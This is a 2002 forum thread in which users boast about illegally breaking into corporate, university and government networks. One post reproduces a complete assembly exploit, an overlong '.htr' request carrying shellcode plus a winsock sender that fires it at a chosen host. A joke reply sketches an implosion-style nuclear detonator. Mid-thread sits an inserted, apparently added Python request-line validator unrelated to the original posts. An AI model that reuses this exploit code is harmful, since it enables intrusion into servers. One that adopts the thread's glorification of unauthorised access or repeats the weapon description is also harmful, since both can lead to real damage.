Forum: The Classroom
Topic: Pop quiz hotshot!
started by: Dark Knight Bob

Posted by Dark Knight Bob on Jan. 10 2002,18:57
i know a lot of people here know shit loads about computers obviously but have any of you ACTUALLY hx0r3d anything, i.e. illegally?

post as my friend bob or something if you think the feds are watching.
Posted by Non on Jan. 10 2002,19:09
Once this friend of mine hacked into this oil company and copied a garbage file and I was like hey man that's no garbage file that is a worm program and we had to go and hack in again and then the cops came but they went to the wrong phone booths and then i was arrested but they let me go.
Posted by Spydir on Jan. 10 2002,20:09
I've cracked my friend's computers as a joke, or just to prove they suck.  I refuse to crack anything "big", unless they're hiring me to, but no one would do that cuz I'm no security expert...

It's funny though.  I'll be in some class and do something "cool" with some computer, and then people start asking me "do you hack?" and I say "I have the general idea of how to, but I don't" then they say "I'll give you 20 bucks if you hack my girlfriend's hotmail account!". I take their 20 dollars and then just tell them the password's "password".  it usually works, too.  pretty fucking sad...
Posted by jim on Jan. 10 2002,20:31
I've done a few...  Just for fun though.

Biggest one was radicausa.com  Not the website, their network.

A friend of mine worked there and I was totally blitzed to find out they had no firewall.  I told him how stupid that was, but he insisted that because everything was NT with no 98/95/ME boxes that it was secured.

I was able to gain full control of their Exchange box, 3 domain controllers, all of their TCPIP based printers in less than 15 minutes.

He told his boss about it, and to the best of my knowledge, they STILL don't have a firewall.

For those who don't know who Radica is, they are the company that makes those little hand held games like Deer Hunter, Bass Fishing, etc.....
Posted by kornalldaway on Jan. 10 2002,21:36
a few personal computers just to prove my point
nothing really major, tried some company servers before. got in web server local site as on. of course schools' network, but that was too easy
Posted by DeadAnztac on Jan. 10 2002,21:37
I went through a h4x0r phase before I hit the 7th grade.  6th grade year (when I was between 10 and 11) I had root on a few SMTP BSD boxen, a DNS server, and 2 or 3 boxes that I couldn't figure out at the time (I had accounts, but the boxes' purpose eluded me then.)  Looking back I believe they may have been directory servers.  (In case you didn't know that's often where a large number of users and passwords are stored and located, often for the purpose of centralized SMTP, POP, NFS, Samba, etc.)  I guess university security was rather weak, for as I told you, I was in 6th grade.  I stopped that after I found out how stupid it was.
Posted by Wiley on Jan. 11 2002,01:05
I had my mad h4x0r phase as well.  I even set up an online < Hacker Test > that's still there. The biggest crack I was involved in was into a .gov network best known for their work putting men on the moon (or did they??), some local Universities (UCI, USC), a biotech company (can't name this one), a few small ISPs and a big one (UUNet).  I thought I was 1337 for a while and once Wired Magazine called me for a comment on an IIS bug (I was involved with some of that kinda stuff for a bit) but that all changed the day I got 0wn3d. Here's the story:
I met up with this hacker kid who was 17 at the time and talking a bunch of smack about all the government sites he rooted.  He had a story that I wasn't buying about how the FBI woke him up at gunpoint and dragged his mom screaming out of the shower right in front of him one morning.  I figured he had just seen Hackers one too many times.  So I broke into his home computer and stole some of his source code for a piece of software he was writing as evidence of how I 0wn3d him.  I also left a calling card sitting in his HKLM\Software\Microsoft\Windows\CurrentVersion\Run reg key.  This kinda pissed him off I guess, and the next week of my life was spent recovering/changing passwords and adding every new security measure I could throw at the network to no avail.  I finally had to make the call "d00d  ...I give up"!
I don't feel so bad now that this kid has a weekly call to the NSA, < testifies in front of Congress on possible computer threats >, gets mentioned in < Microsoft write ups > and is the guy who < named the Code Red worm >.  He was also on the MTV Real Life Hacker special and was the only legit guy on the show.  He's about the most 1337 guy walking the planet right now, and he taught me that just when you think you're the shit somebody can come along and flush your ass.
Posted by Rshias on Jan. 11 2002,03:54
Nope.  Beyond knowing a good deal about computers, the hacking scene always eluded me.  I honestly don't even know where to begin.

It is something I'd like to learn about simply for knowledge's sake, but it might be hard to find a tutor.  Any of you want to volunteer?  ;)
Posted by whiskey@throttle on Jan. 11 2002,04:33
I was BIG into it. I used to live on an underground vessel. It was kinda cool...the brigand chic, for any of you that know it well. I certainly learned a lot. The food sucked, though.

Now and then my friends and I still broadcast our pirate signal and hack into this mega-government mainframe. I'd tell you about it, but unfortunately, no one can be told...

You'd probably just have to see it for yourself.
Posted by askheaves on Jan. 11 2002,06:24
That's a great story, Wiley :)

Anyway, I've never been much into hacking.  Never even really tried that much.  I may have inadvertently exploited a little, but I don't remember.  Frankly, I'm too straight-laced to even get into the scene.  If I ever did, I'd be as white hat as it gets.  I'm just not very l33t :(
Posted by Hex on Jan. 11 2002,06:49
Great story wiley.

I never really "owned" anyone since I consider that to be lame.

I prefer to help ppl who annoy me fuck up their boxes by themselves >:)

Rshias, I can help you there since I have too much time on my hands....

my ICQ number is 106292554
Posted by damien_s_lucifer on Jan. 11 2002,08:10
only hax0ring I ever did was in AOL's chat rooms.  Waaay back when ('91) if you typed in the right commands you could do all kinds of freaky shit, like bomb the chat screen with 1000 lines of "FUCK YOU!" or post as someone else.  It was all cool until one day I made the following mistake:

damien_s_lucifer: i want to get a 386
guide10578: I LIKE TO BLOW GOATS!!!! THEY TASTE GOOD

I had done this to at least a dozen other guides, and they never figured it out.  This one knew the trick and closed my account :p
Posted by aolhell on Jan. 11 2002,17:24
heh..I remember that, dsl.

{S filename.wav  -- play a sound on everyone's pc
{S a: -- access the floppy drive

there were others...
Posted by CatKnight on Jan. 11 2002,18:00
the furthest my hacking experience goes is winnuke :p
Posted by Jimi on Jan. 11 2002,19:53
What are you talking about? Winnuke 0wn5... I'm kidding please don't kill me :D
Posted by Nikita on Jan. 11 2002,19:58
oh yea winnuke ... to get rid of unwanted guests on the lab computers ... or just to annoy slacker labmate who's in the middle of typing a longass email :p

nuke ... NUKE ... NUUUUUUKE!
Posted by Spydir on Jan. 11 2002,20:02
edit: that's what i get for having more than one reply open.

if you want the basics of the security/hacking scene, just pick up a UNIX manual, read up on BugTraq, and keep reading.  Surprisingly simple
Posted by Wiley on Jan. 11 2002,20:09
There are also a lot of good books on the subject.  Maximum Security - A Hacker's Guide to Protecting Your Computer and Network is a good one.  Check your local library  ..that's the big building with all the books.
Posted by Spydir on Jan. 11 2002,22:14
I generally stay away from books that say "hacker" in the title.  After reading one, I think Stopping Hackers or something, I've learned that ignorance really is bliss, especially after seeing the goofy picture of the author smiling like a dumbshit
Posted by CatKnight on Jan. 11 2002,22:32
actually i just remembered i used to hack my wing commander privateer savegames to give my centurion level 5 shield and power generators. that required messing around with hexeditor and stuff. does that count? :)
Posted by Spydir on Jan. 11 2002,23:44
shockingly, in the true meaning of the word, yes it does.
Posted by DuSTman on Jan. 11 2002,23:59
I kinda think that maybe writing your own stuff is the best way to get security: If some dude finds a bug in apache or IIS then they can attack millions of web sites with it.

Write your own web server, and while it won't be as polished, it's unlikely people would try, because all they'd gain is the ability to attack your page and your page only..
Posted by Wiley on Jan. 12 2002,03:00
Quote (DuSTman @ Jan. 11 2002,23:59)
Write your own web server, and while it won't be as polished, it's unlikely people would try, because all they'd gain is the ability to attack your page and your page only..

Not entirely true.  Ignorance of how your webserver works may not be bliss.  Even your custom server software will have to follow some standards so that pages can be viewed.  You still have to allow anonymous access to the files that make up your pages and you have to allow incoming traffic on tcp/ip port 80.  And what type of security model will distinguish between guests and admins  ..will you design your own as well?  What about the OS running everything ...off the shelf or not?  Will your browser report strange behavior back to you or take action on its own to ban access from a dangerous client?  What happens if I pass along something like this:
.386p
locals
jumps
.model flat, stdcall


extrn GetCommandLineA:PROC
extrn GetStdHandle:PROC
extrn WriteConsoleA:PROC
extrn ExitProcess:PROC
extrn WSAStartup:PROC
extrn connect:PROC
extrn send:PROC
extrn recv:PROC
extrn WSACleanup:PROC
extrn gethostbyname:PROC
extrn htons:PROC
extrn socket:PROC
extrn inet_addr:PROC
extrn closesocket:PROC

.data

sploit_length           equ     1157

sploit:
db "GET /"
db 041h, 041h, 041h, 041h, 041h, 041h, 041h
db 576 dup (041h)
db 041h, 041h, 041h, 041h, 041h, 041h, 0b0h, 087h, 067h, 068h, 0b0h, 087h
db 067h, 068h, 090h, 090h, 090h, 090h, 058h, 058h, 090h, 033h, 0c0h, 050h
db 05bh, 053h, 059h, 08bh, 0deh, 066h, 0b8h, 021h, 002h, 003h, 0d8h, 032h
db 0c0h, 0d7h, 02ch, 021h, 088h, 003h, 04bh, 03ch, 0deh, 075h, 0f4h, 043h
db 043h, 0bah, 0d0h, 010h, 067h, 068h, 052h, 051h, 053h, 0ffh, 012h, 08bh
db 0f0h, 08bh, 0f9h, 0fch, 059h, 0b1h, 006h, 090h, 05ah, 043h, 032h, 0c0h
db 0d7h, 050h, 058h, 084h, 0c0h, 050h, 058h, 075h, 0f4h, 043h, 052h, 051h
db 053h, 056h, 0b2h, 054h, 0ffh, 012h, 0abh, 059h, 05ah, 0e2h, 0e6h, 043h
db 032h, 0c0h, 0d7h, 050h, 058h, 084h, 0c0h, 050h, 058h, 075h, 0f4h, 043h
db 052h, 053h, 0ffh, 012h, 08bh, 0f0h, 05ah, 033h, 0c9h, 050h, 058h, 0b1h
db 005h, 043h, 032h, 0c0h, 0d7h, 050h, 058h, 084h, 0c0h, 050h, 058h, 075h
db 0f4h, 043h, 052h, 051h, 053h, 056h, 0b2h, 054h, 0ffh, 012h, 0abh, 059h
db 05ah, 0e2h, 0e6h, 033h, 0c0h, 050h, 040h, 050h, 040h, 050h, 0ffh, 057h
db 0f4h, 089h, 047h, 0cch, 033h, 0c0h, 050h, 050h, 0b0h, 002h, 066h, 0abh
db 058h, 0b4h, 050h, 066h, 0abh, 058h, 0abh, 0abh, 0abh, 0b1h, 021h, 090h
db 066h, 083h, 0c3h, 016h, 08bh, 0f3h, 043h, 032h, 0c0h, 0d7h, 03ah, 0c8h
db 075h, 0f8h, 032h, 0c0h, 088h, 003h, 056h, 0ffh, 057h, 0ech, 090h, 066h
db 083h, 0efh, 010h, 092h, 08bh, 052h, 00ch, 08bh, 012h, 08bh, 012h, 092h
db 08bh, 0d7h, 089h, 042h, 004h, 052h, 06ah, 010h, 052h, 0ffh, 077h, 0cch
db 0ffh, 057h, 0f8h, 05ah, 066h, 083h, 0eeh, 008h, 056h, 043h, 08bh, 0f3h
db 0fch, 0ach, 084h, 0c0h, 075h, 0fbh, 041h, 04eh, 0c7h, 006h, 08dh, 08ah
db 08dh, 08ah, 081h, 036h, 080h, 080h, 080h, 080h, 033h, 0c0h, 050h, 050h
db 06ah, 048h, 053h, 0ffh, 077h, 0cch, 0ffh, 057h, 0f0h, 058h, 05bh, 08bh
db 0d0h, 066h, 0b8h, 0ffh, 00fh, 050h, 052h, 050h, 052h, 0ffh, 057h, 0e8h
db 08bh, 0f0h, 058h, 090h, 090h, 090h, 090h, 050h, 053h, 0ffh, 057h, 0d4h
db 08bh, 0e8h, 033h, 0c0h, 05ah, 052h, 050h, 052h, 056h, 0ffh, 077h, 0cch
db 0ffh, 057h, 0ech, 080h, 0fch, 0ffh, 074h, 00fh, 050h, 056h, 055h, 0ffh
db 057h, 0d8h, 080h, 0fch, 0ffh, 074h, 004h, 085h, 0c0h, 075h, 0dfh, 055h
db 0ffh, 057h, 0dch, 033h, 0c0h, 040h, 050h, 053h, 0ffh, 057h, 0e4h, 090h
db 090h, 090h, 090h, 0ffh, 06ch, 066h, 073h, 06fh, 066h, 06dh, 054h, 053h
db 021h, 080h, 08dh, 084h, 093h, 086h, 082h, 095h, 021h, 080h, 08dh, 098h
db 093h, 08ah, 095h, 086h, 021h, 080h, 08dh, 084h, 08dh, 090h, 094h, 086h
db 021h, 080h, 08dh, 090h, 091h, 086h, 08fh, 021h, 078h, 08ah, 08fh, 066h
db 099h, 086h, 084h, 021h, 068h, 08dh, 090h, 083h, 082h, 08dh, 062h, 08dh
db 08dh, 090h, 084h, 021h, 078h, 074h, 070h, 064h, 06ch, 054h, 053h, 021h
db 093h, 086h, 084h, 097h, 021h, 094h, 086h, 08fh, 085h, 021h, 094h, 090h
db 084h, 08ch, 086h, 095h, 021h, 084h, 090h, 08fh, 08fh, 086h, 084h, 095h
db 021h, 088h, 086h, 095h, 089h, 090h, 094h, 095h, 083h, 09ah, 08fh, 082h
db 08eh, 086h, 021h, 090h, 098h, 08fh, 04fh, 086h, 099h, 086h, 021h
_url2 db 85 dup (021h)
db ".htr HTTP/1.0"
db 00dh,00ah, 00dh, 00ah  
13, 10, 0
logolen equ $-logo

u_length db 10,"No more than 70 chars in 2nd url.",13,10,0
u_lengthl equ $-u_length

errorinit db 10,"Error initializing winsock.", 13, 10, 0
errorinitl equ $-errorinit

nohost db 10,"No host or IP specified.", 13,10,0
nohostl equ $-nohost

noport db 10,"No port specified.",13,10,0
noportl equ $-noport

no_url db 10,"No URL specified.",13,10,0
no_urll equ $-no_url

urlinv db 10,"Invalid URL.. no file specified?",13,10,0
urlinvl equ $-urlinv

reshost db 10,"Error resolving host.",13,10,0
reshostl equ $-reshost

sockerr db 10,"Error creating socket.",13,10,0
sockerrl equ $-sockerr

ipill   db 10,"IP error.",13,10,0
ipilll   equ $-ipill

porterr db 10,"Invalid port.",13,10,0
porterrl equ $-porterr

cnerror db 10,"Error establishing connection.",13,10,0
cnerrorl equ $-cnerror

success db 10,"Data sent!",13,10,0
successl equ $-success

console_in      dd      ?
console_out     dd      ?
bytes_read      dd      ?

wsadescription_len equ 256
wsasys_status_len equ 128

WSAdata struct
wVersion dw ?
wHighVersion dw ?
szDescription db wsadescription_len+1 dup (?)
szSystemStatus db wsasys_status_len+1 dup (?)
iMaxSockets dw ?
iMaxUdpDg dw ?
lpVendorInfo dw ?
WSAdata ends

sockaddr_in struct
sin_family dw ?
sin_port dw ?
sin_addr dd ?
sin_zero db 8 dup (0)
sockaddr_in ends

wsadata WSAdata <?>
sin sockaddr_in <?>
sock dd ?
numbase dd 10
_port db 256 dup (?)
_host db 256 dup (?)
_url db 256 dup (?)
stuff db 042h, 068h, 066h, 075h, 041h, 050h

.code
start:

call    init_console
push    logolen
push    offset logo
call    write_console

call    GetCommandLineA
mov     edi, eax
mov     ecx, -1
xor     al, al
push    edi
repnz   scasb
not     ecx
pop     edi
mov     al, 20h
repnz   scasb
dec     ecx
cmp     ch, 0ffh
jz      @@0
test    ecx, ecx
jnz     @@1
@@0:        
push    nohostl
push    offset nohost
call    write_console
jmp     quit3
@@1:
mov     esi, edi
lea     edi, _host
call    parse
or      ecx, ecx
jnz     @@2
push    noportl
push    offset noport
call    write_console
jmp     quit3
@@2:
lea     edi, _port
call    parse
or      ecx, ecx
jnz     @@3
push    no_urll
push    offset no_url
call    write_console
jmp     quit3

@@3:
push    ecx
lea     edi, _url
call    parse
pop     ecx
cmp     ecx, 71
jb      length_ok
push    u_lengthl
push    offset u_length
call    write_console
jmp     quit3

length_ok:

mov     esi, offset _url
mov     edi, offset _url2
@@10:
xor     al, al
lodsb
cmp     al, 02fh
jz      whaq
test    al, al
jz      @@20
add     al, 021h
stosb
jmp     @@10
@@20:
push    urlinvl
push    offset urlinv
call    write_console
jmp     quit3


whaq:
push    esi
lea     esi, stuff
lodsw
stosw
lodsd
stosd
pop     esi
fileget:        
xor     al, al
lodsb
test    al, al
jz      getdone
add     al, 021h
stosb
jmp     fileget
getdone:

push    offset wsadata
push    0101h
call    WSAStartup
or      eax, eax
jz      winsock_found

push    errorinitl
push    offset errorinit
call    write_console
jmp     quit3

winsock_found:
xor     eax, eax
push    eax
inc     eax
push    eax
inc     eax
push    eax
call    socket
cmp     eax, -1
jnz     socket_ok

push    sockerrl
push    offset sockerr
call    write_console
jmp     quit2

socket_ok:
mov     sock, eax
mov     sin.sin_family, 2
mov     esi, offset _port
lewp1:
xor     al, al
lodsb
test    al, al
jz      go
cmp     al, 039h
ja      port_error
cmp     al, 030h
jb      port_error
jmp     lewp1

port_error:
push    porterrl
push    offset porterr
call    write_console
jmp     quit1

go:

mov     ebx, offset _port
call    str2num
mov     eax, edx
push    eax
call    htons
mov     sin.sin_port, ax

mov     esi, offset _host
lewp:
xor     al, al
lodsb
cmp     al, 039h
ja      gethost
test    al, al
jnz     lewp
push    offset _host
call    inet_addr
cmp     eax, -1
jnz     ip_aight
push    ipilll
push    offset ipill
call    write_console
jmp     quit1

ip_aight:
mov     sin.sin_addr, eax
jmp     continue

gethost:
push    offset _host
call    gethostbyname
test    eax, eax
jnz     gothost

push    reshostl
push    offset reshost
call    write_console
jmp     quit1

gothost:
mov     eax, [eax+0ch]
mov     eax, [eax]
mov     eax, [eax]
mov     sin.sin_addr, eax

continue:
push    size sin
push    offset sin
push    sock
call    connect
or      eax, eax
jz      connect_ok
push    cnerrorl
push    offset cnerror
call    write_console
jmp     quit1

connect_ok:

xor     eax, eax
push    eax
push    sploit_length
push    offset sploit
push    sock
call    send
push    successl
push    offset success
call    write_console

quit1:
push    sock
call    closesocket
quit2:
call    WSACleanup
quit3:
push    0
call    ExitProcess
parse   proc

lewp9:
xor     eax, eax
cld
lodsb
cmp     al, 20h
jz      done
test    al, al
jz      done2
stosb
dec     ecx
jmp     lewp9
done:
dec     ecx
done2:
ret
endp

str2num proc
push    eax ecx edi
xor     eax, eax
xor     ecx, ecx
xor     edx, edx
xor     edi, edi
lewp2:
xor     al, al
xlat
test    al, al
jz      end_it
sub     al, 030h
mov     cl, al
mov     eax, edx
mul     numbase
add     eax, ecx
mov     edx, eax
inc     ebx
inc     edi
cmp     edi, 0ah
jnz     lewp2

end_it:
pop     edi ecx eax
ret
endp

init_console  proc
push    -10
call    GetStdHandle
or      eax, eax
je      init_error
mov     [console_in], eax
push    -11
call    GetStdHandle
or      eax, eax
je      init_error
mov     [console_out], eax
ret
init_error:
push    0
call    ExitProcess
endp

write_console proc    text_out:dword, text_len:dword
pusha
push    0
push    offset bytes_read
push    text_len          
push    text_out          
push    console_out      
call    WriteConsoleA
popa
ret
endp

end     start

Now tell me can you deal with that?
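Wiley's questions above (what the custom server does when a request arrives that no sane browser would send, and whether it bans the client on its own) are the part of this exchange worth turning into code. What follows is an added example, not code from the thread or from either poster: the request-line policy a home-grown web server could apply before it ever maps a path to a file, plus a per-client strike counter that bans repeat offenders. The limits, the sample request lines and the client addresses are all constructed for the example; the only page-derived detail is that the posted request targets a ".htr" path, which a server that never implements that extension should simply refuse.

```python
"""Request-line sanity checks for a home-grown HTTP server (added example).

Every threshold below is an assumed policy value for this example, not a
figure from the thread.  The checks run on the raw request line, before any
routing, so a request that fails them never reaches file-serving code.
"""
import re
from urllib.parse import unquote

MAX_LINE_LEN = 2048        # longest request line we will even parse
MAX_TARGET_LEN = 255       # longest request-target we will try to map to a file
ALLOWED_METHODS = {"GET", "HEAD"}
ALLOWED_VERSIONS = {"HTTP/1.0", "HTTP/1.1"}
# ".htr" is the extension the request posted in the thread targets; a server
# that does not implement it has no reason to accept such paths at all.
BLOCKED_SUFFIXES = (".htr",)
# Characters permitted in one path segment of this toy server.
SEGMENT_RE = re.compile(r"^[A-Za-z0-9._-]*$")


def check_request_line(raw: bytes) -> list[str]:
    """Return the list of policy violations for one raw HTTP request line.

    An empty list means the line is clean enough to hand to the router.
    """
    problems: list[str] = []
    if len(raw) > MAX_LINE_LEN:
        problems.append("request line too long")
    line = raw.rstrip(b"\r\n")
    # A request line is printable ASCII by definition; control bytes or bytes
    # above 0x7E mean someone is sending us something other than a URL.
    if any(b < 0x20 or b > 0x7E for b in line):
        problems.append("non-printable bytes in request line")
        return problems          # nothing further in the line is trustworthy
    text = line.decode("ascii")
    parts = text.split(" ")
    if len(parts) != 3:
        problems.append("request line is not 'METHOD TARGET VERSION'")
        return problems
    method, target, version = parts
    if method not in ALLOWED_METHODS:
        problems.append(f"method {method!r} not allowed")
    if version not in ALLOWED_VERSIONS:
        problems.append(f"version {version!r} not allowed")
    if len(target) > MAX_TARGET_LEN:
        problems.append("target too long")
    if not target.startswith("/"):
        problems.append("target must be an absolute path")
    # Decode %xx escapes once, then judge the decoded path: this is where an
    # encoded NUL or an encoded ".." would otherwise slip past a naive check.
    path = unquote(target.split("?", 1)[0])
    segments = path.split("/")
    if ".." in segments:
        problems.append("path traversal segment")
    if path.lower().endswith(BLOCKED_SUFFIXES):
        problems.append("blocked file extension")
    for seg in segments:
        if not SEGMENT_RE.match(seg):
            problems.append(f"illegal characters in segment {seg!r}")
            break
    return problems


class ClientTracker:
    """Counts violations per client address and bans after a threshold."""

    def __init__(self, max_strikes: int = 3) -> None:
        self.max_strikes = max_strikes
        self.strikes: dict[str, int] = {}
        self.banned: set[str] = set()

    def record(self, client: str, problems: list[str]) -> bool:
        """Record one request's outcome; return True if the client is now banned."""
        if client in self.banned:
            return True
        if problems:
            # Each distinct violation counts as a strike.
            self.strikes[client] = self.strikes.get(client, 0) + len(problems)
            if self.strikes[client] >= self.max_strikes:
                self.banned.add(client)
        return client in self.banned


if __name__ == "__main__":
    # Constructed sample request lines, not traffic captured from anywhere.
    samples = [
        b"GET /index.html HTTP/1.0\r\n",
        b"GET /" + b"A" * 600 + b".htr HTTP/1.0\r\n",
        b"GET /" + b"A" * 600 + b"\x90\x33\xc0" + b".htr HTTP/1.0\r\n",
        b"GET /a%00.html HTTP/1.0\r\n",
    ]
    tracker = ClientTracker()
    for raw in samples:
        found = check_request_line(raw)
        banned = tracker.record("10.0.0.5", found)   # constructed client address
        print(raw[:40], found, "banned" if banned else "ok")
```

The order of the checks matters: the byte-level test comes first because once a line contains non-printable bytes there is no point parsing it as text, and the decoded path is examined rather than the raw target so that percent-encoding cannot hide a NUL or a traversal segment from the suffix and segment rules.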
Posted by Rshias on Jan. 12 2002,05:47
Quote
Not entirely true.  Ignorance of how your webserver works may not be bliss.  Even your custom server software will have to follow some standards so that pages can be viewed.  You still have to allow anonymous access to the files that make up your pages and you have to allow incoming traffic on tcp/ip port 80.  And what type of security model will distinguish between guests and admins  ..will you design your own as well?  What about the OS running everything ...off the shelf or not?  Will your browser report strange behavior back to you or take action on its own to ban access from a dangerous client?  What happens if I pass along something like this:  etc, etc, etc

Okay, now I'm turned on.
Posted by editor on Jan. 14 2002,07:53
Mr Wiley;
I have some spare plutonium in the fridge; would you mind designing a detonator?

How about on your lunch?

Got 50 bucks in cash fer ya
Posted by Wiley on Jan. 14 2002,13:28
Quote (editor @ Jan. 13 2002,23:53)
Mr Wiley;
I have some spare plutonium in the fridge; would you mind designing a detonator?

How about on your lunch?

Got 50 bucks in cash fer ya

Sure, all you gotta do is get yourself some C4 and cut it into hexagon shaped patties.  Then apply the patties around your plutonium casing (this should be round for it to work) in the same pattern as a soccer ball.  Then wire a charge from a photostrobe powered by 12 D batteries to the C4.  You can use the same sort of timer that you plug into the wall to turn your lights on at a certain time to trigger the photostrobe.  Now, pay attention that the wire leaders are all the exact same length.  It is important that all the C4 goes off at once or the plutonium won't get squeezed together in the initial blast.
Now keep in mind that none of this has been tested by myself, and most of it comes from movies  ...but the theory sure looks sound so I think you're ready to rock.
Posted by Nikita on Jan. 14 2002,16:17
Quote (Wiley @ Jan. 11 2002,14:00)
Now tell me can you deal with that?

Easy, pop some extra strength Tylenol and take a nap. :p
Posted by Hex on Jan. 14 2002,16:35
Quote (Rshias @ Jan. 11 2002,16:47)
Quote
<SNIP! way too long.>

Okay, now I'm turned on.

Was it really necessary to quote the whole thing?  :0
Posted by Rshias on Jan. 14 2002,17:32
Sorry, thought I had chopped it down correctly before hitting submit.  Guess it didn't work.  It's fixed now.  :)